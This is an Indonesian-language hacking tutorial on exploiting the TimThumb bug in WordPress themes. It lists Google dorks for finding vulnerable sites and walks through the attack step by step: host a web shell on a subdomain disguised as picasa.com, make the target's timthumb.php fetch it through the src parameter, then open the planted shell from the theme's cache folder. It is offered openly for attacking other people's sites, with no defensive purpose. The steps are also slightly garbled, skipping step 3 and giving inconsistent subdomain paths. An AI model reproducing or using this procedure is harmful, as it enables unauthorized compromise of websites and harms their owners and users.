Tim-thumb
Exploit WordPress adalah teknik hacking yang dapat dilakukan dengan
memanfaatkan bug pada Timthumb.php atau thumb.php.Okke Gk usah Banyak
Bacod Langsung Join TKP :v
Bahan - Bahan :
- Modem
- PC
- Otak
- Subdomain picasa.com.webkamu.org
Langkah - Langkah :
1.Meluncur Ke google Gunakan Dork Berikut
inurl:/wp-content/themes/TheStyle/
inurl:/wp-content/themes/nool/
inurl:/wp-content/themes/PersonalPress/
inurl:/wp-content/themes/SimplePress/
inurl:/wp-content/themes/DeepFocus/
inurl:/wp-content/themes/DelicateNews/
inurl:/wp-content/themes/Bold/
inurl:/wp-content/themes/eStore/
inurl:/wp-content/themes/TheProfessional/
inurl:/wp-content/themes/OnTheGo/
inurl:/wp-content/themes/AskIt/
inurl:/wp-content/themes/Nova/
inurl:/wp-content/themes/eNews/
USE YOUR BRAIN :v
2. Setelah menemukan target coba tambahkan timthumb.php
~> http://site/wp-content/themes/eStore/timthumb.php
4.Setelah Membuat subdomain Uplod shell di subdomain tadi sehingga menjadi
~> picasa.com/websitekamu.org/namashellkamu.php
5.Setelah Selesai Semua Langsung Di eksekusi Web Tadi Dengan Cara
~> http://site/wp-content/themes/eStore/timthumb.php?src= picasa.com/websitekamu.org/shell.php
6.Jika Keluar Seperti Gambar Ini Berarti Succes
7.Langsung Saja Buka Shellnya dgn cara
~> http://site/wp-content/themes/eStore/cache/md5_tadi.php
~> http://site/wp-content/themes/eStore/cache/b3e7dbdafde738b6e31c1d0b7fb93948.php
Thanks To :
EmoticonEmoticon